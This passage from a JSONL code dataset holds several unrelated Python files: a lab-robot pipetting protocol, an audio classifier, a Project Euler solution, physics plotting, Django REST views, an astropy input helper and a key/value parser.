input_file.splitlines()[3].split(',')[:2]\n if not tuberack_scan[:len(tuberack_scan)-4] == tuberack_bar.strip():\n print(tuberack_scan[:len(tuberack_scan)-4])\n raise Exception(f'Tuberack scans do not match ({tuberack_bar}, \\\n{tuberack_scan})')\n if not plate_scan[:len(plate_scan)-4] == plate_bar.strip():\n raise Exception(f'Plate scans do not match ({plate_bar}, {plate_scan})')\n\n if input_file2:\n tuberack_bar2, plate_bar2 = input_file2.splitlines()[3].split(',')[:2]\n if not tuberack_scan2[:len(tuberack_scan2)-4] == tuberack_bar2.strip():\n print(tuberack_scan2[:len(tuberack_scan2)-4])\n raise Exception(f'Tuberack2 scans do not match ({tuberack_bar2}, \\\n {tuberack_scan2})')\n if not plate_scan2[:len(plate_scan2)-4] == plate_bar2.strip():\n raise Exception(\n f'Plate2 scans do not match ({plate_bar2}, {plate_scan2})')\n\n # parse\n inputdata = [[\n [val.strip() for val in line.split(',')]\n for line in input_file.splitlines()[4:]\n if line and line.split(',')[0].strip()]]\n\n tubelist = [[\n well for col in rack.columns()\n for well in col[:8]]]\n\n if input_file2:\n\n inputdata.append([\n [val.strip() for val in line.split(',')]\n for line in 
input_file2.splitlines()[4:]\n if line and line.split(',')[0].strip()])\n\n tubelist.append([\n well for col in rack.columns()\n for well in col[8:]])\n\n for data, plate, tubes_ordered in zip(inputdata, plates, tubelist):\n for line in data:\n tube = tubes_ordered[int(line[0])-1]\n well = plate.wells()[int(line[1])-1]\n if len(line) >= 3 and line[2]:\n disposal_vol = float(line[2])\n else:\n disposal_vol = default_disposal_vol\n if len(line) >= 4 and line[3]:\n transfer_vol = float(line[3])\n else:\n transfer_vol = default_transfer_vol\n\n # remove contents of well\n _pick_up(p300)\n\n ctx.max_speeds['A'] = 100 # slow descent\n ctx.max_speeds['Z'] = 100 # slow descent\n\n # effective tip capacity 280 with 20 uL air gap\n reps = math.ceil(disposal_vol / 280)\n\n vol = disposal_vol / reps\n\n for rep in range(reps):\n p300.move_to(well.top())\n p300.air_gap(20)\n p300.aspirate(vol, well.bottom(1))\n p300.dispense(\n vol+20, ctx.fixed_trash.wells()[0].top(-5), rate=1.5)\n ctx.delay(seconds=1)\n\n # to improve completeness of removal\n for clearance in [0.7, 0.4, 0.2, 0]:\n p300.aspirate(20, well.bottom(clearance))\n\n del ctx.max_speeds['A'] # reset to default\n del ctx.max_speeds['Z'] # reset to default\n\n p300.drop_tip()\n\n # transfer tube to well\n _pick_up(p300)\n\n # effective tip capacity 280 with 20 uL air gap\n reps = math.ceil(transfer_vol / 280)\n\n vol = transfer_vol / reps\n\n for rep in range(reps):\n p300.move_to(tube.top())\n p300.air_gap(20)\n p300.aspirate(vol, tube.bottom(0.2))\n p300.dispense(vol+20, well.top(-1), rate=1.5)\n ctx.delay(seconds=1)\n\n p300.drop_tip()\n\n # track final used tip\n if not ctx.is_simulating():\n if not os.path.isdir(folder_path):\n os.mkdir(folder_path)\n data = {pip.name: tip_log[pip]['count'] for pip in tip_log}\n with open(tip_file_path, 'w') as outfile:\n json.dump(data, outfile)\n","sub_path":"protocols/121d15-2-96-Greiner-1000/redoreplacementpicking.ot2.apiv2.py","file_name":"redoreplacementpicking.ot2.apiv2.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"22325254","text":"n = int(input())\n# candidates must be a set (not a generator), so & and - below work\ndic = set(range(n))\nwhile True:\n ip = input()\n if ip == 'HELP':\n break\n if ip not in ('YES', 'NO', 'HELP'):\n # parse the guessed set from the current line rather than reading a fresh input()\n mlp = set(map(int, ip.split()))\n if ip == 'YES':\n dic = dic & mlp\n if ip == 'NO':\n dic = dic - mlp\nprint(*dic)\n","sub_path":"files/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395228988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport collections\nimport json\nimport logging\nimport os\nimport time\nimport warnings\nimport copy\nimport sys\nimport threading\nimport librosa\nimport numpy as np\nimport sounddevice as sd\nimport queue\n\n\nimport soundfile as sf\nclass confirmIdentity:\n\n ###########################################################################################\n ###########################################################################################\n #Adding constants for the audio.###########################################################\n ###########################################################################################\n ###########################################################################################\n\n ROOT_FILE_PATH = os.path.dirname(os.path.realpath(__file__)) #The path where this file is 
located.\n\n MODEL_LABELS_PATH = ROOT_FILE_PATH + '/model_labels.json' #The location of model labels.\n\n MODEL_H5_PATH = ROOT_FILE_PATH + '/model.h5' #The location of model.h5 file.\n\n MODEL_JSON_PATH = ROOT_FILE_PATH + '/model.json' #The location of model.json file.\n\n AUDIO_DEVICE = 0 # Recording device name as listed by `python -m sounddevice`\n\n AUDIO_DURATION = 10 # Duration of audio material to retain, in seconds\n\n SAMPLING_RATE = 44100# Audio sampling rate, other parameters are hand-tuned for 44.1 kHz\n\n CHUNK_SIZE = 882 # Spectrogram hop_size, 882 samples @ 44.1 kHz = 20 ms\n FFT_SIZE = 2 * CHUNK_SIZE # Spectrogram FFT window length\n BLOCK_SIZE = 16 * CHUNK_SIZE # Size of sound device audio capture buffer\n PREDICTION_STEP = 5 # How often new predictions should be output, in blocks\n PREDICTION_STEP_IN_MS = int(PREDICTION_STEP * BLOCK_SIZE / SAMPLING_RATE * 1000)\n SEGMENT_LENGTH = 100 # Lookback window for classification, in chunks, 100 @ 20 ms = 2 s\n\n PROCESSING_DELAY = 0 # Audio streaming delay compensation, in processing steps\n\n MEL_BANDS = 80 # Number of mel frequency bands\n MEL_FREQS = librosa.core.mel_frequencies(n_mels=MEL_BANDS)\n\n AUDIO_MEAN = 20.0\n AUDIO_STD = 20.0\n\n Overlap = int(BLOCK_SIZE/2)\n\n\n\n\n\n ###########################################################################################\n ###########################################################################################\n #Adding constants for the audio.###########################################################\n ###########################################################################################\n ###########################################################################################\n logger = None\n signal = None\n spectoram = None\n audio_queue = None\n last_chunk = None\n predictions = None\n live_audio_feed = None\n model = None\n q = None\n event = None\n\n def __init__(self):\n self.q = queue.Queue(maxsize=self.BLOCK_SIZE)\n self.event = threading.Event()\n\n\n logging.basicConfig(level=logging.DEBUG)\n self.logger = logging.getLogger(__name__)\n\n with open(self.MODEL_LABELS_PATH, 'r') as labels_file:\n self.labels = json.load(labels_file)\n\n\n self.signal = np.zeros((self.AUDIO_DURATION * self.SAMPLING_RATE, 1), dtype='float32')\n self.spectrogram = np.zeros((self.MEL_BANDS, self.AUDIO_DURATION * self.SAMPLING_RATE // self.CHUNK_SIZE), dtype='float32')\n self.audio_queue = collections.deque(maxlen=1000) # Queue for incoming audio blocks\n self.last_chunk = np.zeros((self.CHUNK_SIZE, 1), dtype='float32') # Short term memory for the next step\n\n self.predictions = np.zeros((len(self.labels), self.AUDIO_DURATION * self.SAMPLING_RATE // (self.BLOCK_SIZE * self.PREDICTION_STEP)), dtype='float32')\n self.live_audio_feed = collections.deque(maxlen=1)\n self.model = None\n\n\n\n def get_raspberry_stats(self):\n freq = None\n temp = None\n try:\n with open('/sys/class/thermal/thermal_zone0/temp', 'r') as file:\n temp = int(file.read())\n temp /= 1000.\n temp = np.round(temp, 1)\n temp = '{}\\'C'.format(temp)\n with open('/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq', 'r') as file:\n freq = int(file.read())\n freq /= 1000.\n freq = '{} MHz'.format(int(freq))\n except:\n pass\n\n return temp, freq\n\n def get_predictions(self):\n print(self.predictions)\n\n\n def start(self, pathToAudioFile):\n self.targetsToStore = []\n # Import classifier model\n self.logger.info('Initializing a convolutional neural network model...')\n global model\n\n THEANO_FLAGS = 
('device=cpu,'\n 'floatX=float32,'\n 'dnn.conv.algo_bwd_filter=deterministic,'\n 'dnn.conv.algo_bwd_data=deterministic')\n\n os.environ['THEANO_FLAGS'] = THEANO_FLAGS\n os.environ['KERAS_BACKEND'] = 'theano'\n\n import keras\n keras.backend.set_image_dim_ordering('th')\n\n with open(self.MODEL_JSON_PATH, 'r') as file:\n cfg = file.read()\n model = keras.models.model_from_json(cfg)\n\n model.load_weights(self.MODEL_H5_PATH)\n self.logger.debug('Loaded Keras model with weights.')\n\n #Import recorded autio and distribute as chunks.\n for block in sf.blocks(pathToAudioFile, blocksize=self.BLOCK_SIZE, overlap=self.Overlap, dtype='float32', always_2d=True):\n self.audio_queue.append(copy.deepcopy(block))\n print(np.shape(block))\n\n blocks = []\n processing_queue = collections.deque()\n # Process incoming audio blocks\n keepGoing = True\n while keepGoing:\n if(self.audio_queue.__len__() < 1):\n keepGoing = False\n\n while len(self.audio_queue) > 0 and len(blocks) < self.PREDICTION_STEP:\n blocks.append(self.audio_queue.popleft())\n if len(blocks) == self.PREDICTION_STEP:\n new_audio = np.concatenate(blocks)\n\n # Populate audio for live streaming\n self.live_audio_feed.append(new_audio[:, 0].copy())\n\n blocks = []\n processing_queue.append(new_audio)\n\n if len(processing_queue) > self.PROCESSING_DELAY + 1: # +1 for JavaScript streaming delay\n start_time = time.time()\n\n # Populate audio signal\n step_audio = processing_queue.pop()\n n_samples = len(step_audio)\n self.signal[:-n_samples] = self.signal[n_samples:]\n self.signal[-n_samples:] = step_audio[:]\n\n # Populate spectrogram\n new_spec = librosa.feature.melspectrogram(np.concatenate([self.last_chunk, step_audio])[:, 0],\n self.SAMPLING_RATE, n_fft=self.FFT_SIZE,\n hop_length=self.CHUNK_SIZE, n_mels=self.MEL_BANDS)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') # Ignore log10 zero division\n new_spec = librosa.core.perceptual_weighting(new_spec, self.MEL_FREQS, amin=1e-5,\n ref_power=1e-5, top_db=None)\n new_spec = np.clip(new_spec, 0, 100)\n n_chunks = np.shape(new_spec)[1]\n self.spectrogram[:, :-n_chunks] = self.spectrogram[:, n_chunks:]\n self.spectrogram[:, -n_chunks:] = new_spec\n\n # Classify incoming audio\n self.predictions[:, :-1] = self.predictions[:, 1:]\n offset = self.SEGMENT_LENGTH // 2\n pred = self.classify([\n np.stack([self.spectrogram[:, -(self.SEGMENT_LENGTH + offset):-offset]]),\n np.stack([self.spectrogram[:, -self.SEGMENT_LENGTH:]]),\n ])\n self.predictions[:, -1] = pred\n target = self.labels[np.argmax(pred)]\n self.targetsToStore.append(target)\n # Clean up\n self.last_chunk[:] = step_audio[-self.CHUNK_SIZE:]\n\n end_time = time.time()\n time_spent = int((end_time - start_time) * 1000)\n temp, freq = self.get_raspberry_stats()\n blocks_in_ms = int(self.PREDICTION_STEP * self.BLOCK_SIZE / self.SAMPLING_RATE * 1000)\n msg = '[{}] {}% = {} ms / {} ms ({} blocks) - temp: {} | freq: {} ==> {}'\n timestamp = time.strftime('%H:%M:%S')\n self.logger.debug(msg.format(timestamp, np.round(time_spent / blocks_in_ms * 100, 1),\n time_spent, blocks_in_ms, self.PREDICTION_STEP, temp, freq, target))\n\n time.sleep(0.05)\n\n\n def classify(self, segments):\n X = np.stack(segments)\n X -= self.AUDIO_MEAN\n X /= self.AUDIO_STD\n pred = model.predict(X)\n pred = np.average(pred, axis=0, weights=np.arange(len(pred)) + 1)\n return pred\n\n\n\n #gets the most common occurance of an identity\n def getTarget(self):\n counter = 0\n if(self.targetsToStore.__len__() > 1):\n num = self.targetsToStore[0]\n for i in 
self.targetsToStore:\n appearance = self.targetsToStore.count(i)\n if(appearance > counter):\n counter = appearance\n num = i\n return num\n else:\n noresponse = \"No known noise was detected!\"\n return noresponse","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497303169","text":"\"\"\"\nProject Euler Problem #28\n==========================\n\nStarting with the number 1 and moving to the right in a clockwise\ndirection a 5 by 5 spiral is formed as follows:\n\n 21 22 23 24 25\n 20 7 8 9 10\n 19 6 1 2 11\n 18 5 4 3 12\n 17 16 15 14 13\n\nIt can be verified that the sum of both diagonals is 101.\n\nWhat is the sum of both diagonals in a 1001 by 1001 spiral formed in the\nsame way?\n\"\"\"\n\nfrom math import floor\nfrom pprint import PrettyPrinter\n\ndef fill_grid(size):\n ''' This is ugly as sin. Figure out a cleaner way to do it.'''\n\n total_elements = size**2\n\n middle = floor(size / 2)\n\n grid = [[0]*size for _ in range(size)]\n\n direction_steps = 1\n\n grid[middle][middle] = 1\n curr_element = 2\n\n x_pos, y_pos = middle, middle\n while True:\n for move in [[1,0],[0,1]]:\n for _ in range(direction_steps):\n x_pos += move[0]\n y_pos += move[1]\n\n grid[x_pos][y_pos] = curr_element\n\n if curr_element == total_elements:\n return grid\n else:\n curr_element += 1\n\n for move in [[-1,0],[0,-1]]:\n for _ in range(direction_steps+1):\n x_pos += move[0]\n y_pos += move[1]\n\n grid[x_pos][y_pos] = curr_element\n\n if curr_element == total_elements:\n return grid\n else:\n curr_element += 1\n\n direction_steps += 2\n\n\ndef sum_diagonals(grid):\n\n total = 0\n\n for i in range(len(grid)):\n total += grid[i][i]\n total += grid[len(grid)-1-i][i]\n\n middle = floor(len(grid) / 2)\n total -= grid[middle][middle]\n\n return total\n\n# ------------------------------------------------------\n\nprint(sum_diagonals(fill_grid(1001)))\n","sub_path":"028.py","file_name":"028.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211398358","text":"import sys, os, ROOT, argparse\nfrom collections import defaultdict\n\nROOT.TH1.SetDefaultSumw2()\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(\"\")\nROOT.gStyle.SetPaintTextFormat(\"3.2f\")\nROOT.gStyle.SetFrameLineWidth(2)\n\nusage = \"usage: %prog [options]\"\nparser = argparse.ArgumentParser(usage)\nparser.add_argument(\"--inputDir\", dest=\"inputDir\", help=\"Path to input\", default=\"NULL\", type=str) \n\narg = parser.parse_args()\n\nOPTIONSMAP = {\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D1\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D2\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D3\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J} D4\"}},\n \"h_njets_1l_HT300_ge7j_ge1b_Mbl\" : {\"X\" : {\"min\" : 7, \"max\" : 15, \"title\" : \"N_{J}\"}}\n}\n\ndef doOptions(histo, histoName):\n\n is1D = \"TH1\" in histo.ClassName()\n\n for axis, options in OPTIONSMAP[histoName].iteritems():\n\n if axis == \"X\":\n if \"rebin\" in options:\n if is1D: histo.Rebin(options[\"rebin\"])\n else: histo.RebinX(options[\"rebin\"])\n if \"min\" in options and \"max\" in options: 
histo.GetXaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n if \"title\" in options: histo.GetXaxis().SetTitle(options[\"title\"])\n if axis == \"Y\":\n if \"rebin\" in options:\n if is1D: histo.Rebin(options[\"rebin\"])\n else: histo.RebinY(options[\"rebin\"])\n if \"min\" in options and \"max\" in options: histo.GetYaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n if \"title\" in options: histo.GetYaxis().SetTitle(options[\"title\"])\n if axis == \"Z\":\n if \"min\" in options and \"max\" in options: histo.GetZaxis().SetRangeUser(options[\"min\"],options[\"max\"])\n\ndef prettyHisto(histo,magicFactor=1.0,magicFactor2=1.0):\n histo.GetYaxis().SetLabelSize(magicFactor*0.055); histo.GetYaxis().SetTitleSize(magicFactor*0.08); histo.GetYaxis().SetTitleOffset(0.7/magicFactor)\n histo.GetXaxis().SetLabelSize(magicFactor*0.055); histo.GetXaxis().SetTitleSize(magicFactor*0.08); histo.GetXaxis().SetTitleOffset(0.8/magicFactor2)\n histo.GetZaxis().SetLabelSize(magicFactor*0.055); histo.GetZaxis().SetTitleSize(magicFactor*0.06)\n\ndef fillMap(inRootFile, theMap):\n\n if \".root\" not in inRootFile: return\n histoFile = ROOT.TFile.Open(inRootFile, \"READ\")\n for hkey in histoFile.GetListOfKeys():\n if \"TH\" not in hkey.GetClassName(): continue\n\n if hkey.GetName() == \"EventCounter\" or hkey.GetName().find(\"njets\") == -1: continue\n\n histo = hkey.ReadObj()\n histo.SetDirectory(0)\n\n histo.Sumw2()\n \n theMap.setdefault(hkey.GetName(), histo)\n\nif __name__ == '__main__':\n\n XCANVAS = 2400; YCANVAS = 2400\n\n if arg.inputDir == \"NULL\": quit()\n stub = arg.inputDir.split(\"condor/\")[-1]\n\n inRootFile = arg.inputDir + \"/2017_MC.root\"\n \n outpath = \"./plots/%s/\"%(stub)\n if not os.path.exists(outpath): os.makedirs(outpath)\n\n mapPFAhistos = {}\n\n fillMap(inRootFile, mapPFAhistos)\n\n # Save the final histograms\n\n njetsD1 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\"]; prettyHisto(njetsD1)\n njetsD2 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\"]; prettyHisto(njetsD2)\n njetsD3 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\"]; prettyHisto(njetsD3)\n njetsD4 = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\"]; prettyHisto(njetsD4)\n\n njets = mapPFAhistos[\"h_njets_1l_HT300_ge7j_ge1b_Mbl\"]; prettyHisto(njets)\n\n XMin = 0; XMax = 1\n YMin = 0; YMax = 1\n\n njetsD1.SetTitle(\"\"); njetsD1.Scale(1./njetsD1.Integral()); doOptions(njetsD1, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d1\")\n njetsD2.SetTitle(\"\"); njetsD2.Scale(1./njetsD2.Integral()); doOptions(njetsD2, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d2\")\n njetsD3.SetTitle(\"\"); njetsD3.Scale(1./njetsD3.Integral()); doOptions(njetsD3, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d3\")\n njetsD4.SetTitle(\"\"); njetsD4.Scale(1./njetsD4.Integral()); doOptions(njetsD4, \"h_njets_1l_HT300_ge7j_ge1b_Mbl_d4\")\n njets.SetTitle(\"\"); njets.Scale(1./njets.Integral()); doOptions(njets, \"h_njets_1l_HT300_ge7j_ge1b_Mbl\")\n\n njetsD1.Divide(njets); njetsD1.SetMinimum(0.50); njetsD1.SetMaximum(1.50); njetsD1.GetYaxis().SetNdivisions(308)\n njetsD2.Divide(njets); njetsD2.SetMinimum(0.50); njetsD2.SetMaximum(1.50); njetsD2.GetYaxis().SetNdivisions(308)\n njetsD3.Divide(njets); njetsD3.SetMinimum(0.50); njetsD3.SetMaximum(1.50); njetsD3.GetYaxis().SetNdivisions(308)\n njetsD4.Divide(njets); njetsD4.SetMinimum(0.50); njetsD4.SetMaximum(1.50); njetsD4.GetYaxis().SetNdivisions(308)\n\n njetsD1.SetMarkerColor(ROOT.kBlack); njetsD1.SetLineColor(ROOT.kBlack); njetsD1.SetMarkerSize(4); njetsD1.SetMarkerStyle(20); njetsD1.SetLineWidth(3)\n 
njetsD2.SetMarkerColor(ROOT.kRed); njetsD2.SetLineColor(ROOT.kRed); njetsD2.SetMarkerSize(4); njetsD2.SetMarkerStyle(20); njetsD2.SetLineWidth(3)\n njetsD3.SetMarkerColor(ROOT.kBlue); njetsD3.SetLineColor(ROOT.kBlue); njetsD3.SetMarkerSize(4); njetsD3.SetMarkerStyle(20); njetsD3.SetLineWidth(3)\n njetsD4.SetMarkerColor(ROOT.kGreen+2); njetsD4.SetLineColor(ROOT.kGreen+2); njetsD4.SetMarkerSize(4); njetsD4.SetMarkerStyle(20); njetsD4.SetLineWidth(3)\n\n mvaBins = [\"D1\", \"D2\", \"D3\", \"D4\"]\n\n for mva in mvaBins:\n\n c1 = ROOT.TCanvas(\"njets%s\"%(mva), \"njets%s\"%(mva), XCANVAS, YCANVAS); \n c1.cd(); ROOT.gPad.SetPad(XMin, YMin, XMax, YMax)\n\n ROOT.gPad.SetGridy(); ROOT.gPad.SetGridx()\n ROOT.gPad.SetTopMargin(0.03)\n ROOT.gPad.SetLeftMargin(0.11)\n ROOT.gPad.SetBottomMargin(0.15)\n ROOT.gPad.SetRightMargin(0.04)\n\n if mva == \"D1\": njetsD1.Draw(\"L\")\n elif mva == \"D2\": njetsD2.Draw(\"L\")\n elif mva == \"D3\": njetsD3.Draw(\"L\")\n elif mva == \"D4\": njetsD4.Draw(\"L\")\n\n c1.SaveAs(\"%s/njets%s_Total_Ratio.pdf\"%(outpath,mva))\n","sub_path":"Analyzer/test/finalNJetsRatioPlots.py","file_name":"finalNJetsRatioPlots.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226553841","text":"import os\nimport configparser\n\nfrom util.repo_handling.repo_file import repo_file\n\n\nclass GitRepository(object):\n\n worktree = None\n gitdir = None\n conf = None\n\n def __init__(self, path, force=False):\n self.worktree = path\n self.gitdir = os.path.join(path, \".git\")\n\n if not (force or os.path.isdir(self.gitdir)):\n raise Exception(\"Not a Git repository %s\" % path)\n\n # Read configuration file in .git/config\n self.conf = configparser.ConfigParser()\n cf = repo_file(self, \"config\")\n\n if cf and os.path.exists(cf):\n self.conf.read([cf])\n\n elif not force:\n raise Exception(\"Configuration file missing\")\n\n if not force:\n vers = int(self.conf.get(\"core\", \"repositoryformatversion\"))\n if vers != 0:\n raise Exception(\"Unsupported repositoryformatversion %s\" % vers)\n","sub_path":"objects/GitRepository.py","file_name":"GitRepository.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289978453","text":"#!/usr/bin/env python3\r\n\r\nimport sys\r\n\r\ninput_file = sys.argv[1]\r\nprint(\"Output: {}\".format(sys.argv[1]))\r\nfilereader = open(input_file, 'r')\r\nfor row in filereader:\r\n print(row.strip())\r\nfilereader.close()\r\n","sub_path":"first_script.py","file_name":"first_script.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555834940","text":"from .models import Question, Answer, Tag, User\nfrom .serializers import QuestionSerializer, AnswerSerializer, UserSerializer, TagSerializer\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom questions import serializers\n# from .serializers import \n\n@api_view(['GET'])\ndef questionList(request):\n questions = Question.objects.all()\n serializer = QuestionSerializer(questions, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef questionDetail(request, pk):\n questions = Question.objects.get(id=pk)\n serializer = QuestionSerializer(questions, many=False)\n return 
Response(serializer.data)\n\n@api_view(['POST'])\ndef questionCreate(request):#save logged user in request\n serializer = QuestionSerializer(data=request.data)\n \n if serializer.is_valid():\n serializer.save(user=request.user)\n \n return Response(serializer.data)\n\n@api_view(['PUT'])\ndef questionEdit(request, pk):\n question = Question.objects.get(id=pk)\n serializer = QuestionSerializer(instance=question, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef questionDelete(request, pk):\n question = Question.objects.get(id=pk)\n question.delete()\n\n return Response('Your question has been deleted.')\n\n@api_view(['GET'])\ndef answerList(request):\n answers = Answer.objects.all()\n serializer = AnswerSerializer(answers, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef answerDetail(request, pk):\n answers = Answer.objects.get(id=pk)\n serializer = AnswerSerializer(answers, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef answerCreate(request):\n serializer = AnswerSerializer(data=request.data)\n question=Question.objects.get(id=request.data[\"question\"])\n \n if serializer.is_valid():\n serializer.save(user=request.user, question=question)\n \n return Response(serializer.data)\n\n@api_view(['GET'])\ndef tagList(request):\n tags = Tag.objects.all()\n serializer = TagSerializer(tags, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef tagDetail(request, pk):\n tags = Tag.objects.get(id=pk)\n serializer = TagSerializer(tags, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef tagCreate(request):\n serializer = TagSerializer(data=request.data)\n \n if serializer.is_valid():\n serializer.save()\n \n return Response(serializer.data)","sub_path":"questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100222567","text":"\"\"\"\nModule\n------\nentry.py:\n\nSummary\n-------\nContains routines to facilitate entry of required input data objects, either from manual user input or from\na data file (csv).\n\nNotes\n-----\nMay include database access in the future to save having to create a csv from catalogue after update\n\n\"\"\"\n# Imports included here:\nimport re\n\n# Astropy\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.coordinates.name_resolve import NameResolveError\nfrom astropy.io import ascii\nfrom astropy.table import Table\n\nfrom LCExtract import config\n\n\ndef setFilterUsage():\n # uses global filterSelection\n\n getch = input('Please select filters to display (e.g. griz)....: ')\n # if no entry set default to griz, or check for valid filter combinations\n config.filterSelection = getch\n print()\n\n\ndef setEntryType():\n print('Script will accept file or manual input. 
Default is manual.')\n while True:\n getch = input(f'Please select file (f) or manual object (m) entry..........: ')\n if getch == '':\n getch = 'm'\n if getch[0].lower() in ('f', 'm'):\n break\n print()\n\n return getch[0].lower()\n\n\ndef setManualEntryType():\n while True:\n getch = input(f'Please select named object (n) or coordinate (c) entry..........: ')\n if getch == '':\n continue\n if getch[0].lower() in ('n', 'c'):\n break\n print()\n\n return getch[0].lower()\n\n\ndef getObjectsCSV():\n # uses global defaultFileName\n error_to_catch = getattr(__builtins__, 'FileNotFoundError', IOError)\n while True:\n getch = input(f'Please enter filename, or for default ({config.defaultFileName})...: ')\n getch = config.defaultFileName if getch == '' else getch\n try:\n f = open(getch)\n except error_to_catch:\n print(f'Unable to locate file \"{getch}\". Please try again.')\n else:\n f.close()\n print(f'Using file \"{getch}\".')\n break\n\n data = ascii.read(getch, guess=False, format='csv', header_start=0, data_start=1)\n return data\n\n\ndef getUserObject():\n manualEntryType = setManualEntryType()\n if manualEntryType == 'n': # named object entry\n while True:\n tempName = input('Enter object name....: ')\n try:\n c = SkyCoord.from_name(tempName, parse=True)\n except NameResolveError:\n print('Unable to resolve. Please try again.')\n else:\n print(f'Object {tempName} found in catalog.')\n break\n elif manualEntryType == 'c': # object coordinate entry\n while True:\n print('Enter object coordinates (ICRS frame. Deg assumed unless specified).')\n tempCoordRA = input('RA (e.g. 10.625, 10d37m30s, 0h42m30s, 00 42 30)....: ')\n tempCoordRA += 'd' if not re.findall('[hdms]', tempCoordRA) else ''\n tempCoordDEC = input('DEC (e.g. 41.2, 41d12m00s, +41 12 00)...: ')\n tempCoordDEC += 'd' if not re.findall('[dms]', tempCoordDEC) else ''\n try:\n c = SkyCoord(tempCoordRA, tempCoordDEC)\n except ValueError:\n print('Unable to identify position. Please try again.')\n except u.UnitsError:\n print('Units error occurred. 
Please try again.')\n else:\n print(f'Object at {c.to_string(\"hmsdms\")} found.')\n tempName = 'Object in ' + c.get_constellation()\n break\n print()\n manual = [{'Name': tempName, # 'Name': 'Sky position: 153.139, 53.117',\n 'RA': c.ra.degree, # 'RA': 153.1393271,\n 'DEC': c.dec.degree, # 'DEC': 53.117343,\n 'Description': f'Position: {c.to_string(\"hmsdms\")} '}] # 'Description': 'Manual input test'\n return manual\n\n\ndef getObjects():\n entryType = setEntryType()\n if entryType == 'f':\n return getObjectsCSV()\n elif entryType == 'm':\n singleObjectData = getUserObject()\n\n tbl = Table(rows=singleObjectData)\n return tbl\n","sub_path":"build/lib/LCExtract/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524866899","text":"# vim: set et ts=4 sw=4 fileencoding=utf-8:\n'''\nModule for processing key/value files like vfms.\n'''\n\nimport re\n\nKV_PATTERN = re.compile(r'''((?:[^\\s\"']|\"[^\"]*\"|'[^']*')+)''')\nOB_PATTERN = re.compile(r'''^(\"\\w+[\\w\\s*]+\"|\\w+)$''')\n\n\ndef parse(kvfile):\n '''\n Parse the key/value file.\n\n Returns the key/value data as a dict.\n '''\n ret = {}\n key = None\n val = None\n while True:\n line = kvfile.readline()\n if line:\n line = line.strip()\n if line and not line.startswith('//'):\n if line.startswith('}'):\n return ret\n elif line.startswith('{'):\n val = parse(kvfile)\n ret[key.strip('\"')] = val\n else:\n key = OB_PATTERN.findall(line)\n if key:\n key = key[0]\n else:\n key, val = KV_PATTERN.findall(line)\n ret[key.strip('\"')] = val.strip('\"')\n else:\n return ret\n\n\ndef persist(kvdict, outfile, indent=''):\n '''\n Persist the key/value dict to the file.\n '''\n for key, val in kvdict.items():\n if isinstance(val, dict):\n outfile.write(u'{0}{1}\\n'.format(indent, key))\n outfile.write(u'{0}{{\\n'.format(indent))\n persist(val, outfile, '\\t{0}'.format(indent))\n outfile.write(u'{0}}}\\n'.format(indent))\n else:\n outfile.write(u'{0}\"{1}\" \"{2}\"\\n'.format(indent, key, val))\n","sub_path":"nail/util/kvf.py","file_name":"kvf.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 